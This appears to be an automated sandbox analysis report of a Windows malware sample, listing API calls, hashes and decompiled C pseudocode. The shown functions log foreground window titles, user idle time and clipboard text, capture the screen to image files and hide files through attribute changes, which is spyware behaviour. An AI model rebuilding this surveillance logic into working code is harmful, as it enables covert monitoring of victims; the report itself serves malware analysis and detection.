                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000), ref: 0041108C
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,00000000), ref: 00411096
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000002,00000000), ref: 00410FB4
                                          • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                          • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                          • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                          • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                          • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                          • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                          • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                          • Part of subcall function 00411927: OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,0041B310,?,?,00410FD9), ref: 00411933
                                          • Part of subcall function 00411927: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000002,?,?,00410FD9), ref: 00411940
                                          • Part of subcall function 00411927: OpenServiceW.ADVAPI32(00000000,00000000,?,?,00410FD9), ref: 00411948
                                          • Part of subcall function 00411927: CloseServiceHandle.ADVAPI32(00000000,?,?,00410FD9), ref: 00411955
                                          • Part of subcall function 00411927: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00410FD9), ref: 004119A0
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000,00000001,0041B310,?), ref: 004110F4
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000001,0041B310,?), ref: 00411104
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,?), ref: 00411111
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,?), ref: 0041111B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000007F,?,?,?,?,?,?,?,?,?,?,0041B310,?), ref: 00411132
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310,?), ref: 0041113E
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000), ref: 0041118E
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,00000000), ref: 00411198
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000), ref: 0041121F
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,00000000), ref: 00411229
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000), ref: 004112A9
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,00000000), ref: 004112B3
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000), ref: 00411336
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,00000000), ref: 00411340
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000007A,?,?,?,?,0041B310,00000000), ref: 0041135A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00411371
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000079), ref: 004113AD
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0041B310,00000000), ref: 004113BE
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$D@2@@0@Hstd@@V?$basic_string@$V10@0@$??1?$basic_string@$??0?$basic_string@V01@@$G@2@@std@@G@std@@$?length@?$basic_string@$V12@$??4?$basic_string@?c_str@?$basic_string@?substr@?$basic_string@A?$basic_string@OpenServiceV01@$??2@??3@?find@?$basic_string@CloseD@1@@G@1@@HandleManagerV10@
                                        • String ID:
                                        • API String ID: 3693186435-0
                                        • Opcode ID: cdf030826f3260cd6d20b69c12764cebe95a03dce4cc6de715870de60c0c61ee
                                        • Instruction ID: 8efa13a56e58a3380b66c3db6183ea909b867b6e0f3936dc641b94412a702233
                                        • Opcode Fuzzy Hash: cdf030826f3260cd6d20b69c12764cebe95a03dce4cc6de715870de60c0c61ee
                                        • Instruction Fuzzy Hash: E6C1B4B1D101086BDB04B7A2ED56DFF777CEB50304F00481EFA16A71D2EE395A89C66A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • Sleep.KERNEL32(00002710), ref: 00405607
                                          • Part of subcall function 00405532: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(80000000,00000007,00000000,00000003,00000080,00000000,00415664,?,0041BCB0,00405614), ref: 00405562
                                          • Part of subcall function 00405532: CreateFileW.KERNEL32(00000000), ref: 00405569
                                          • Part of subcall function 00405532: GetFileSize.KERNEL32(00000000,00000000), ref: 00405578
                                          • Part of subcall function 00405532: Sleep.KERNEL32(00002710), ref: 004055A7
                                          • Part of subcall function 00405532: CloseHandle.KERNEL32(00000000), ref: 004055AE
                                          • Part of subcall function 00405532: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004055D6
                                        • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664), ref: 00405619
                                        • ?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE_NXZ.MSVCP60 ref: 0040562E
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 0040563F
                                        • CreateDirectoryW.KERNEL32(00000000), ref: 00405646
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00405651
                                        • GetFileAttributesW.KERNEL32(00000000), ref: 00405658
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000080), ref: 00405669
                                        • SetFileAttributesW.KERNEL32(00000000), ref: 00405670
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012), ref: 00405681
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000001), ref: 00405690
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040569D
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004056AA
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004056C5
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004056D0
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004056DC
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004056F0
                                        • PathFileExistsW.SHLWAPI(00000000), ref: 004056F7
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00405708
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00405714
                                          • Part of subcall function 00412DDF: CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00405729
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 0040574D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405756
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00405733
                                          • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                          • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                          • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                          • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040575F
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040576F
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00405778
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00405782
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000), ref: 0040579A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004057AA
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004057BB
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004057C4
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 004057D1
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000013), ref: 004057E2
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000006), ref: 004057F1
                                        • SetFileAttributesW.KERNEL32(00000000), ref: 004057F8
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$?c_str@?$basic_string@$G@2@@std@@G@std@@$File$??0?$basic_string@$??1?$basic_string@V01@@$?length@?$basic_string@$?data@?$basic_string@AttributesCreateD@1@@V01@$??4?$basic_string@Sleep$??9std@@?empty@?$basic_string@CloseD@2@@0@DirectoryExistsHandlePathSizeV?$basic_string@Y?$basic_string@
                                        • String ID:
                                        • API String ID: 3042614570-0
                                        • Opcode ID: 575ddf90373583570e2370749e334e5a8c8c652185d1d6edf2812296b84c8a7a
                                        • Instruction ID: c86808d706488c02b7588af0601caf96bbb35f31f7bc76b7b462248bc21621a9
                                        • Opcode Fuzzy Hash: 575ddf90373583570e2370749e334e5a8c8c652185d1d6edf2812296b84c8a7a
                                        • Instruction Fuzzy Hash: B0514E72A00909EBCB05ABA0ED5DADE7B78EF84315F04807AF503A71A0DF745A45CF98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 37%
                                        			E004059BE(intOrPtr __ecx) {
                                        				char _v5;
                                        				char _v6;
                                        				char _v7;
                                        				intOrPtr _v12;
                                        				signed int _v16;
                                        				char _v28;
                                        				char _v44;
                                        				char _v60;
                                        				char _v76;
                                        				void* _v92;
                                        				intOrPtr _t41;
                                        				int _t43;
                                        				CHAR* _t45;
                                        				signed int _t48;
                                        				char* _t58;
                                        				char* _t59;
                                        				struct HWND__* _t93;
                                        				intOrPtr _t94;
                                        				void* _t99;
                                        				intOrPtr _t112;
                                        
                                        				_v12 = __ecx;
                                        				while(1) {
                                        					_t41 = _v12;
                                        					if( *((intOrPtr*)(_t41 + 0x3c)) == 0 &&  *((intOrPtr*)(_t41 + 0x3d)) == 0) {
                                        						break;
                                        					}
                                        					if(( *0x41b990 & 0x00000001) == 0) {
                                        						 *0x41b990 =  *0x41b990 | 0x00000001;
                                        						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
                                        						E00413E72(E00405BB5);
                                        					}
                                        					Sleep(0x1f4);
                                        					_t93 = GetForegroundWindow();
                                        					_t43 = GetWindowTextLengthA(_t93);
                                        					_t95 = _t43;
                                        					_t9 = _t95 + 1; // 0x1
                                        					_t45 = _t9;
                                        					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z(_t45, 0,  &_v6);
                                        					if(_t43 != 0) {
                                        						__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                        						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        						GetWindowTextA(_t93, _t45, _t45);
                                        						_t58 =  &_v44;
                                        						__imp__??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z(_t58, 0x41b998);
                                        						if(_t58 == 0) {
                                        							_t59 =  &_v44;
                                        							__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t59);
                                        							__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                        							__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z(_t59 - 1);
                                        							_t112 =  *0x41b93e; // 0x0
                                        							if(_t112 == 0) {
                                        								_t103 = _t99 - 0x10;
                                        								L00414176();
                                        								L00414170();
                                        								_t99 = _t99 - 0x10 + 0x18;
                                        								E004054E9(_v12, _t103,  &_v60,  &_v60, "\r\n[ ",  &_v44);
                                        								__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(" ]\r\n", 0);
                                        							} else {
                                        								_t99 = _t99 - 0x10;
                                        								__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                        								E00405DD3(_v12,  &_v44);
                                        							}
                                        						}
                                        					}
                                        					_t94 = _v12;
                                        					_t71 = _t94;
                                        					E00406C35(_t94);
                                        					if(E0041269B(_t94) < 0xea60) {
                                        						L16:
                                        						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        						continue;
                                        					} else {
                                        						while( *((intOrPtr*)(_t94 + 0x3c)) != 0 ||  *((intOrPtr*)(_t94 + 0x3d)) != 0) {
                                        							_t48 = E0041269B(_t71);
                                        							if(_t48 < 0xea60) {
                                        								__imp___itoa(_v16 / 0xea60,  &_v28, 0xa);
                                        								_t101 = _t99 + 0xc - 0x10;
                                        								__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v28,  &_v7, " minutes }\r\n", 0);
                                        								L00414176();
                                        								L00414170();
                                        								_t99 = _t99 + 0xc - 0x10 + 0x18;
                                        								E004054E9(_t94, _t101,  &_v76,  &_v76, "\r\n{ User has been idle for ",  &_v28);
                                        								__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        								__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        								goto L16;
                                        							}
                                        							_v16 = _t48;
                                        							Sleep(0x3e8);
                                        						}
                                        						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        						break;
                                        					}
                                        				}
                                        				return 0;
                                        			}


                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004059F6
                                        • Sleep.KERNEL32(000001F4), ref: 00405A0C
                                        • GetForegroundWindow.USER32 ref: 00405A12
                                        • GetWindowTextLengthA.USER32(00000000), ref: 00405A1B
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000001,00000000,?), ref: 00405A2F
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00405A40
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00405A4A
                                        • GetWindowTextA.USER32 ref: 00405A52
                                        • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP60(?,0041B998), ref: 00405A61
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00405A76
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00405A7F
                                        • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(-00000001), ref: 00405A8A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00405AA1
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[ ,?, ],?,?,00000000), ref: 00405AC9
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?, ],?,?,00000000), ref: 00405AD3
                                          • Part of subcall function 004054E9: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 004054FC
                                          • Part of subcall function 004054E9: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 0040550F
                                          • Part of subcall function 004054E9: SetEvent.KERNEL32(?,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405518
                                          • Part of subcall function 004054E9: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405527
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?, ],?,?,00000000), ref: 00405AE6
                                        • Sleep.KERNEL32(000003E8,?,?,?,?,?, ],?,?,00000000), ref: 00405B27
                                        • _itoa.MSVCRT ref: 00405B3D
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?, minutes },?,?,?,?,?,?,?,?,?,?,?,?, ]), ref: 00405B5C
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,{ User has been idle for ,00000000,?,?,?,?,?,?,?,?,?,?,?,?, ]), ref: 00405B6C
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00405B76
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405B88
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405B91
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405B9A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?, ],?,?,00000000), ref: 00405BA8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$V?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V01@@$D@1@@V01@Window$?length@?$basic_string@SleepTextV10@V10@@Y?$basic_string@$??4?$basic_string@??8std@@?c_str@?$basic_string@?resize@?$basic_string@D@2@@0@0@EventForegroundLength_itoa
                                        • String ID: [ ${ User has been idle for $ ]$ minutes }
                                        • API String ID: 615312007-3343415809
                                        • Opcode ID: 5f570c7ad1d30cb41594ba76545dd26972d348bd779eaad3ce5967d6990f75db
                                        • Instruction ID: 24516c956339191e20f1f3c27382aafae9a0e704c06eebb7e5bf761840e1d674
                                        • Opcode Fuzzy Hash: 5f570c7ad1d30cb41594ba76545dd26972d348bd779eaad3ce5967d6990f75db
                                        • Instruction Fuzzy Hash: CC517072900609EBCB00EBA0DC899EF7F78EF44315F04407AE502E7191EB785989CFA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00410D89,?,png,0041BCB0), ref: 00410958
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00410963
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0041096E
                                          • Part of subcall function 0040FA46: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040FA5C
                                          • Part of subcall function 0040FA46: CreateCompatibleDC.GDI32(00000000), ref: 0040FA68
                                          • Part of subcall function 0040FA46: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040FD20
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00410989
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410993
                                        • SHCreateMemStream.SHLWAPI(00000000), ref: 0041099A
                                          • Part of subcall function 0040F925: GdipLoadImageFromStreamICM.GDIPLUS(00000000,?,00000000), ref: 0040F942
                                          • Part of subcall function 0040FE07: malloc.MSVCRT ref: 0040FE2E
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000,00000000,00000000), ref: 004109C2
                                          • Part of subcall function 00410AF7: GdipSaveImageToFile.GDIPLUS(?,004109D1,?,00000000,00000000,?,004109D1,00000000), ref: 00410B09
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001B,00000000), ref: 004109DF
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004109F5
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00410A02
                                          • Part of subcall function 00412DDF: CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00410A1B
                                        • DeleteFileW.KERNEL32(00000000), ref: 00410A22
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00410A2F
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410A38
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00410A4D
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410A57
                                          • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                          • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                          • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                          • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00410D89,?,dat,?,00000000), ref: 00410A7F
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00410A8A
